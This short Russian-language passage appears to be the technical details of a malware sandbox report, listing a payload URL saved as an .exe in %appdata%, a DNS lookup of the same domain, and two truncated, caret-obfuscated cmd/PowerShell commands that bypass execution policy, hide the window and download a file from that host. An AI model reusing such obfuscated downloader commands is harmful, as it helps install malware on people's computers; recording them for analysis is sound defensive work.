Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^w^e^rS^h^Ell^.^eXE ^-ExEC^utIOnPO^Licy^ bYpasS ^-^nO^P^Rof^IlE ^-wInD^O^wstY^L^e HID^d^e^n^ ^(^n^ew-ObJ^EC^t^ ^sYSTEM^.NE^T.WE^bcLiENT^).doW^N^loa^dFIL^e('http://flowers-...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /c "PO^w^e^rS^h^Ell^.^eXE ^-ExEC^utIOnPO^Licy^ bYpasS ^-^nO^P^Rof^IlE ^-wInD^O^wstY^L^e HID^d^e^n^ ^(^n^ew-ObJ^EC^t^ ^sYSTEM^.NE^T.WE^bcLiENT^).doW^N^loa^dFIL^e('http://flowers-...' (со скрытым окном)